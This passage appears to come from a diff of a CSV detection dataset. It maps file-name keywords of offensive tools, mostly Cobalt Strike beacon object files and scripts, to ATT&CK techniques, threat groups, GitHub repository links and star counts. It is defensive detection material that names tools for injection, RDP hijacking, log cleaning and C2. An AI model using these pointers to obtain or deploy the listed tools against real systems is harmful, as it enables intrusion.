T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*beacon_funcs.c*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.h*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.x64.*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.x86.*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" -"*beacon_generate.py*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_generate.py*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_generate.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*Beacon_GETPOST*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*beacon_host_script*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*beacon_host_script*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*beacon_host_script*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_inline_execute*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" -"*beacon_log_clean*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*beacon_output_ps.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*beacon_log_clean*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*beacon_output_ps.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*beacon_print*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 